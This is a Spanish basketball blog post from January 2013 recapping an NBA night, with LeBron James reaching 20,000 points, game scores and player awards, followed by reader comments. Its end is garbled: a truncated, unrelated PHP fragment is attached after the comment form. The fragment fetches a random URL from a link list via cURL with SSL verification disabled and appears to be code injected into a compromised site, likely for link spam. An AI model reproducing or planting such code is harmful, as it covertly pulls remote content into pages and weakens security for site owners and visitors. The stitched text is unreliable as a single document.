La Crónica: Abran paso al Rey

17 de January de 2013 por txusma

LeBron James se ha convertido en el jugador más joven en alcanzar los 20.000 puntos. Un hito más en la carrera de un jugador que pasará a los anales de la historia gane los anillos que gane. Para celebrarlo se marcó otro partido de los suyos, cercano al triple doble, y repartió también la asistencia número 5.000 de su carrera. Hay que decir que el rival se lo puso muy fácil. Stephen Curry no jugó tras torcerse de nuevo su tobillo maldito y los Warriors se vinieron abajo. Cualquier parecido con el equipo que marcha 5º en la durísima conferencia Oeste fue pura coincidencia. A la media parte los Heat ya tienen muy encarrilado el partido y al acabar el tercer cuarto la ventaja era de 30 puntos (92-75). Los Warriors tendrán que readaptarse rápido a esta situación si no quieren caer mucho en la clasificación. No se espera que Curry se pierda muchos partidos pero ese tobillo siempre le ha dado problemas.

El Nuggets-Thunder se presentaba interesante a pesar de jugarse en Oklahoma. El equipo de George Karl llevaba 6 partidos seguidos ganando y mostraba muy buenas sensaciones. A la hora de la verdad, el partido solo duró un cuarto, lo que necesitó Russell Westbrook para anotar 16 puntos de todos los colores y poner a su equipo 16 puntos arriba. A partir de ahí, control de los Thunder ante unos Nuggets  totalmente impotentes y desquiciados. Perdieron 21 balones (97-117).

Los Nets se las prometían muy felices ante unos Hawks que habían suspendido a Josh Smith durante un partido y que venían de perder 6 de sus últimos 7 encuentros. Los de Brooklyn se encontraban en un racha diametralmente opuesta: Venían de ganar 7 partidos consecutivos y esperaban cazar el octavo ante un equipo bastante corto de efectivos. No contaban con Jeff Teague. El base de los Hawks, que llevaba varios partidos jugando muy por debajo de su nivel, explotó con 28 puntos y 11 asistencias y lideró a un equipo que corrió como nunca. Pachulia, que disfrutó de muchos minutos, se quedó muy cerquita del triple-doble (95-109). 

A Indiana también se le atragantaron los Magic. Yo ya me he quedado sin palabras para describir lo que día a día hace Nikola Vucevic. Octavo doble-doble consecutivo para el montenegrino, que promedia 14 rebotes en los últimos 5 partidos y que tiene a tiro convertirse en el máximo reboteador de la competición. A lo mejor ahora el trade de Dwight Howard no parece tan descompensado. Al final de la primera parte, el partido ya estaba muy encarrilado para los Magic, que llegaron a ganar de 22 puntos a uno de los equipos más en forma de la liga en estos momentos (86-97).

En el Oeste se jugaron un par de duelos a priori muy interesantes. Los Mavs se impusieron a los Rockets por 100-105. Dirk cada vez se va pareciendo más a Dirk y James Harden estuvo muy poco acertado. Un tapón de Elton Brand aseguró el partido para los suyos. Los Spurs, por su parte, no tuvieron problemas ante unos Grizzlies en horas bajas tras perder su tercer partido consecutivo por más de 20 puntos (82-103).

Austin Rivers se llevó el duelo paterno-filial ante su padre. Los Hornets se impusieron a los Celtics en un encuentro extraño. Llegados los minutos finales, en los que se supone que los veteranos sacan a relucir lo mejor de sí mismos, fueron los jóvenes de New Orleans los que acertaron y se llevaron el partido (90-78). Mal encuentro de la mayoría de jugadores verdes.

Para acabar, victoria de los Bulls ante los Raptors con Carlos Boozer bailando claqué y un magullado Luol Deng anotando el tiro definitivo(107-105); victoria de Sacramento ante los Wizards liderados por Tyreke Evans (94-95); y victoria de Cleveland ante los Blazers (93-88).

EL DATO

Ya hemos comentado que anoche LeBron James se convirtió en el jugador más joven en alcanzar los 20000 puntos y que también repartió su asistencia número 5000. Ha necesitado 726 partidos para conseguirlo. Solo Oscar Robertson lo ha conseguido en menos partidos, 671. Jerry West, 789, es el tercero de la lista.

PREMIOS

MVP: Sigue apretando fuerte DeMarcus Cousins, anoche 26 puntos y 16 rebotes. Si está en el escaparate cada noche brilla más. También hay que mencionar al gran LeBron James (25-10-7), a Jeff Teague (28-4-11) y a Kyrie Irving (31-3-5), pero nos vamos a quedar con el fantástico partido de Carlos Boozer en la sufrida victoria de Chicago en Toronto. 36 puntos (con un gran 16/24) y 12 rebotes para el bueno de “Carlitos”.

Rookie: Tremendo el partido de Bradley Beal con 26 puntos en una gran serie de 9/14 incluidos 6 triples en 7 intentos,  sumados a sus 3 rebotes y 6 asistencias. Solo le faltó meter ese último tiro ganador.

Sorpresa: Ninguno de los dos termina por afianzarse como el pívot que necesitan los Nuggets pero anoche fueron los mejores de su equipo. 31 puntos con un acierto de 11/12 para la pareja Kosta Koufos Javale McGee. Que tomen nota en Oklahoma que tienen un agujero ahí.

Decepción: Nos está gustando mucho Golden State este año, pero ayer sin Curry no dieron la talla ante los campeones. Klay Thompson se quedo en solo 2 puntitos.

Esfuerzo en vano: Dos aleros que están creciendo y de qué manera esta temporada se quedaron sin la victoria. 20 puntos y 10 rebotes para Paul George y 23 puntos 12 rebotes para Nicolas Batum.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Ojo a cómo se están poniendo las plazas 7 y 8 de Playoffs en el Oeste. Hay 6 equipos que aspiran ahora mismo a esas plazas, tres van para arriba y tres para abajo. Rockets, Blazers y Wolves llevan 5, 4 y 4 derrotas seguidas respectivamente, y Jazz, Lakers y Mavs suman 2, 2 y 4 victorias consecutivas. Parece mentira pero los Lakers están ya “solo” a 2.5 partidos de puestos de Playoffs.

    Eso sí, esta noche, Miami Heat @ LA Lakers.

      Citar

  2. Ruxixón dice:
    #2

    Estaba pensando en que Boozer esta temporada está demostrando mucho más pero al menos estadísticamente no se refleja,tiene más protagonismo ofensivo en ausencia de Rose pero eso también protagoniza un descenso en su porcentaje de acierto,y coge más rebotes.Al menos la sensación que da es otra.Sorpresa en ese partido los 27 puntos y 5 rebotes de Alan Anderson desde el banquillo para Toronto,insuficientes para ganar a los siempre compettiivos Bulls de la mano del tiro ganador de Deng,del que algunos dicen puede ser falta en ataque.

    Al ver el boxscore de NOLA contra C’s con convencimiento de un buen partido de Eric Gordon y veo que no ha jugado,¿alguien sabe si se debe a las eternas lesiones?¿otra causa?

    Para acabar me quito el sombrero ante LeBron,estuve mirando qué opciones tiene Durant para superarle porque creo que nadie más puede estar en esos guarismo al menos por ahora,y en 3 años y medio debería anotar practicamente 9000 puntos para quitarle esa marca a LJ.El partido contra los Warriors mostró la mejor versión defensiva del equipo,la cara de los PO,parece que todos se activaron al 100% para una noche especial.

      Citar

  3. Jose Luis dice:
    #3

    Faltas en ataque como esas hay muchas cada partido. El problema está en si considerarlas o no, y la liga por ahora no las considera. Para mí es falta, un atacante no debería poder meter el brazo y desplazar al defensa, y deberían pitarse mucho más… pero la liga no las considera así.

      Citar

  4. Simon dice:
    #4

    Ruxixón:

    Al ver el boxscore de NOLA contra C’s con convencimiento de un buen partido de Eric Gordon y veo que no ha jugado,¿alguien sabe si se debe a las eternas lesiones?¿otra causa?

    Se debe a que lo están cuidando mucho, era un partido back to back de NOLA asi que por eso no jugó para no cargarlo demasiado.

      Citar

  5. Esteban dice:
    #5

    Q manera de jugar y ganar los hornets, no llegaran a PO, pero a este ritmo estaran cerca del 50 por ciento, enorme futuro tiene esa plantilla

    El expiring de kaman y dado el rendimiento de aminu y gordon no parece tan tan malo el trade de CP3

      Citar

  6. Esteban dice:
    #6

    Y q decir de la levantada de bradley BEAL, despues de un inicio mas que decepcionante, a explotado de manera fantastica, quiza no sea el nuevo ray allen, pero sin dudas tiene pasta de escolta titular y buen anortador/tirador para varios años y justifica holgadamente su eleccion de draft

      Citar

  7. Ruxixón dice:
    #7

    Simon: Se debe a que lo están cuidando mucho, era un partido back to back de NOLA asi que por eso no jugó para no cargarlo demasiado.

    Muchas gracias simon.Hacen bien pues en los Hornets,su regreso fue muy fuerte y está bien dosificarlo.

      Citar

  8. Chipi dice:
    #8

    ¿Y Stern no dice nada al respecto?

    Genial Bradley Beal. El que me está decepcionando un poco en los últimos partidos es Kidd-Gildchrist. Quizás sea un buen momento para examinar a quién le empieza a afectar el rookie wall.

      Citar

  9. Esteban dice:
    #9

    Chipi:
    ¿Y Stern no dice nada al respecto?

    Genial Bradley Beal. El que me está decepcionando un poco en los últimos partidos es Kidd-Gildchrist. Quizás sea un buen momento para examinar a quién le empieza a afectar el rookie wall.

    a deal, lillard y barnes evidentemente no

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>